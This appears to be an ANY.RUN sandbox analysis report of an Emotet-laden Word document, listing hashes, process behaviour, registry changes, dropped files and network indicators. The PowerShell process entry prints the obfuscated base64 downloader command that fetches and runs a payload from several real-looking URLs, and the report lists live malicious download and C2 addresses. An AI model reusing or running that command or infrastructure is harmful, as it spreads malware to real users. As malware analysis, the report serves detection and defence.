analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Acuerdo(1).doc

Full analysis: https://app.any.run/tasks/b0ee729c-c1d7-404b-b0e6-a86340a530b9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 10, 2019, 20:32:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

2D2B366C0E380D3868C00793B162483F

SHA1:

21354EE075A67761AA4499797823B88E0E581F24

SHA256:

9EC427F45A5DA2747138306297B47821E1A76F4BC3C2CD60D0A9045159AEAAE3

SSDEEP:

3072:E3MMsXSi54XEmpDP4NaNJgj+H8AbliNKDzaJFUKc0UTE7yZRUV7RJeOzi8F:ms5WX1jFu88AbAEDzYUTE7yZRVUi8F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2820)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2820)
    • Request from PowerShell which ran from Office

      • PoWersheLL.exe (PID: 4056)
    • Application was dropped or rewritten from another process

      • 200.exe (PID: 3600)
      • 200.exe (PID: 3008)
      • wabmetagen.exe (PID: 3808)
      • wabmetagen.exe (PID: 3276)
    • Downloads executable files from the Internet

      • PoWersheLL.exe (PID: 4056)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3276)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3808)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3808)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3808)
  • SUSPICIOUS

    • Creates files in the user directory

      • PoWersheLL.exe (PID: 4056)
    • Application launched itself

      • 200.exe (PID: 3008)
    • Executable content was dropped or overwritten

      • PoWersheLL.exe (PID: 4056)
      • 200.exe (PID: 3600)
    • Starts itself from another location

      • 200.exe (PID: 3600)
    • Connects to unusual port

      • wabmetagen.exe (PID: 3808)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2820)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2820)
      • firefox.exe (PID: 2236)
    • Reads CPU info

      • firefox.exe (PID: 2236)
      • firefox.exe (PID: 2364)
      • firefox.exe (PID: 4032)
      • firefox.exe (PID: 2264)
      • firefox.exe (PID: 2064)
    • Application launched itself

      • firefox.exe (PID: 2236)
    • Dropped object may contain Bitcoin addresses

      • firefox.exe (PID: 2236)
    • Reads settings of System Certificates

      • firefox.exe (PID: 2236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://p5LJ9s5jOMXS0iA
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://p5LJ9s5jOMXS0iA
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00D35209
WordDocumentBodySectPRsidRDefault: 0051139A
WordDocumentBodySectPRsidR: 0051139A
WordDocumentDocPrRsidsRsidVal: 0051139A
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 76216 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: zp3oQ67Z
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 4
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 4
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:06 19:07:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:06 19:07:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
11
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 200.exe no specs 200.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe firefox.exe firefox.exe firefox.exe firefox.exe firefox.exe

Process information

PID
CMD
Path
Indicators
Parent process
2820"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Acuerdo(1).doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
4056PoWersheLL -e JABEAFkAaQBhAGYAUwBNAD0AKAAnAEgAagAnACsAJwBJACcAKwAnAG4AUgBUAHoAaAAnACkAOwAkAHIAVQBUAFEATgBpAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEIAegBqAHEAcgB6AD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvAC8AbQBpAGEAbQBpAGYAbABvAHIAJwArACcAaQBkAGEAaQBuAHYAZQBzACcAKwAnAHQAaQBnAGEAdAAnACsAJwBvAHIALgBjACcAKwAnAG8AbQAnACsAJwAvADQAOABSADgAbgBjAGMAJwArACcAdwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AeQB1AHMAJwArACcAdQAnACsAJwBmAHMAZQB2AGkAbQAuAGMAbwBtAC8ANAAnACsAJwBhAGoANQBmADYAMwBFAEAAaAB0ACcAKwAnAHQAcAA6AC8AJwArACcALwAnACsAJwBkACcAKwAnAG8AZwAnACsAJwBtAGUAbgBjAHkAYQBwAGkAJwArACcALgBjACcAKwAnAG8AbQAvAGYAegAnACsAJwBtAHQAJwArACcAQwBFAGcAegBAAGgAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AbQB5AHYAaQAnACsAJwBkAGkAJwArACcAbwAuAHMAJwArACcAaQB0AGUAJwArACcALwB6AGUAQQB0AHEAbgBLAFEAJwArACcAYgBGAEAAJwArACcAaAB0AHQAcAA6AC8ALwBjAG8AJwArACcAbQBlACcAKwAnAGkAbgBpACcAKwAnAHQAaQAnACsAJwBhACcAKwAnAHQAaQAnACsAJwB2AGUALgBvAHIAZwAnACsAJwAvAGsAJwArACcAcgBoADgAbQB6AEMAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAdQBTAGkATQBEAHcAcgA9ACgAJwBSAHoANgB6AGgAJwArACcASAA1ACcAKwAnAGYAJwApADsAJABLAFgAMgBzADIANwBjACAAPQAgACgAJwAyADAAJwArACcAMAAnACkAOwAkAEUAdAB3AE4AVgBKAE8APQAoACcAYwA2ACcAKwAnAFUANAB3AHYAJwApADsAJABqAFIASgBZADcAUgBMAGkAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABLAFgAMgBzADIANwBjACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQARABpAEQAbwAyAFEATQBxACAAaQBuACAAJABCAHoAagBxAHIAegApAHsAdAByAHkAewAkAHIAVQBUAFEATgBpAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEQAaQBEAG8AMgBRAE0AcQAsACAAJABqAFIASgBZADcAUgBMAGkAKQA7ACQASgBhAG4AegBtAGYASAA9ACgAJwBvAGwAJwArACcAZgAnACsAJwBYAHcAbAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABqAFIASgBZADcAUgBMAGkAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABqAFIASgBZADcAUgBMAGkAOwAkAGMASwBpAFIAMgA1AGkAPQAoACcASABaAGQAQgAnACsAJwA5AHYAMQAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAbgBOADIAZABOAHEAPQAoACcAVABtAEUAcgB0ACcAKwAnAFUAJwApADsAC:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLL.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3008"C:\Users\admin\AppData\Local\Temp\200.exe" C:\Users\admin\AppData\Local\Temp\200.exePoWersheLL.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Ressources du compilateur Visual Basic .NET
Exit code:
0
Version:
7.00.9951
Modules
Images
c:\users\admin\appdata\local\temp\200.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
3600"C:\Users\admin\AppData\Local\Temp\200.exe"C:\Users\admin\AppData\Local\Temp\200.exe
200.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Ressources du compilateur Visual Basic .NET
Exit code:
0
Version:
7.00.9951
Modules
Images
c:\users\admin\appdata\local\temp\200.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
3276"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
200.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Ressources du compilateur Visual Basic .NET
Exit code:
0
Version:
7.00.9951
Modules
Images
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
3808"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Ressources du compilateur Visual Basic .NET
Version:
7.00.9951
Modules
Images
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
2236"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\firefox.exe
explorer.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Version:
61.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
4032"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.0.551678772\1629403932" -childID 1 -isForBrowser -prefsHandle 1448 -prefsLen 8309 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 1496 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
61.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
2364"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.6.293541264\303440408" -childID 2 -isForBrowser -prefsHandle 2428 -prefsLen 11442 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2472 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
61.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
2264"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2236.12.1177280000\1884727266" -childID 3 -isForBrowser -prefsHandle 2964 -prefsLen 11808 -schedulerPrefs 0001,2 -greomni "C:\Program Files\Mozilla Firefox\omni.ja" -appomni "C:\Program Files\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files\Mozilla Firefox\browser" - 2236 "\\.\pipe\gecko-crash-server-pipe.2236" 2976 tabC:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Version:
61.0.2
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\program files\mozilla firefox\msvcp140.dll
c:\program files\mozilla firefox\vcruntime140.dll
Total events
2 461
Read events
1 966
Write events
490
Delete events
5

Modification events

(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:~"$
Value:
7E222400040B0000010000000000000000000000
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2820) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313472542
(PID) Process:(2820) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472656
(PID) Process:(2820) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472657
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
040B00008A252BD67FC1D40100000000
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:c$
Value:
63242400040B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:c$
Value:
63242400040B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2820) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
60
Text files
19
Unknown types
46

Dropped files

PID
Process
Filename
Type
2820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9AEE.tmp.cvr
MD5:
SHA256:
2820WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE065BE.tmp
MD5:
SHA256:
4056PoWersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\46QBQOCOZF9H42O4WCQO.temp
MD5:
SHA256:
2236firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm
MD5:
SHA256:
2236firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.tmp
MD5:
SHA256:
2236firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs-1.js
MD5:
SHA256:
2236firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
MD5:
SHA256:
4056PoWersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2820WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:4EBE9CB13A95AA4D33E0FE969D68D4BC
SHA256:21A9D2698F8FE76EB91678C355B24A49377714715A948C38D46DA16AF0C70466
2236firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\qldyz51w.default\safebrowsing-updating\block-flash-digest256.sbstore
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
17
TCP/UDP connections
34
DNS requests
88
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3808
wabmetagen.exe
GET
174.84.250.37:443
http://174.84.250.37:443/
US
malicious
2236
firefox.exe
GET
174.84.250.37:80
http://174.84.250.37/
US
malicious
4056
PoWersheLL.exe
GET
301
184.106.55.126:80
http://miamifloridainvestigator.com/48R8nccw
US
html
335 b
malicious
2236
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
2236
firefox.exe
GET
174.84.250.37:80
http://174.84.250.37/
US
malicious
4056
PoWersheLL.exe
GET
200
184.106.55.126:80
http://miamifloridainvestigator.com/48R8nccw/
US
executable
264 Kb
malicious
2236
firefox.exe
POST
200
172.217.16.131:80
http://ocsp.pki.goog/GTSGIAG3
US
der
463 b
whitelisted
2236
firefox.exe
POST
200
172.217.16.131:80
http://ocsp.pki.goog/GTSGIAG3
US
der
463 b
whitelisted
2236
firefox.exe
POST
200
172.217.16.131:80
http://ocsp.pki.goog/GTSGIAG3
US
der
463 b
whitelisted
2236
firefox.exe
POST
200
93.184.220.29:80
http://ocsp.digicert.com/
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2236
firefox.exe
2.16.186.50:80
detectportal.firefox.com
Akamai International B.V.
whitelisted
4056
PoWersheLL.exe
184.106.55.126:80
miamifloridainvestigator.com
Liquid Web, L.L.C
US
malicious
3808
wabmetagen.exe
187.131.137.216:50000
Uninet S.A. de C.V.
MX
malicious
3808
wabmetagen.exe
174.84.250.37:443
US
malicious
2236
firefox.exe
52.27.184.151:443
search.services.mozilla.com
Amazon.com, Inc.
US
unknown
2236
firefox.exe
143.204.8.62:443
snippets.cdn.mozilla.net
US
unknown
2236
firefox.exe
52.18.148.152:443
location.services.mozilla.com
Amazon.com, Inc.
IE
unknown
2236
firefox.exe
172.217.16.131:80
ocsp.pki.goog
Google Inc.
US
whitelisted
2236
firefox.exe
216.58.207.74:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
2236
firefox.exe
34.208.103.195:443
tiles.services.mozilla.com
Amazon.com, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
miamifloridainvestigator.com
  • 184.106.55.126
unknown
detectportal.firefox.com
  • 2.16.186.50
  • 2.16.186.112
  • 104.107.216.187
  • 104.107.216.169
whitelisted
a1089.dscd.akamai.net
  • 2.16.186.112
  • 2.16.186.50
  • 104.107.216.169
  • 104.107.216.187
whitelisted
search.services.mozilla.com
  • 52.27.184.151
  • 34.216.89.123
  • 52.89.32.107
whitelisted
search.r53-2.services.mozilla.com
  • 52.89.32.107
  • 34.216.89.123
  • 52.27.184.151
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
cs9.wac.phicdn.net
  • 93.184.220.29
whitelisted
tiles.services.mozilla.com
  • 34.208.103.195
  • 34.208.7.98
  • 34.209.108.219
  • 34.216.156.21
  • 34.218.217.119
  • 52.25.70.97
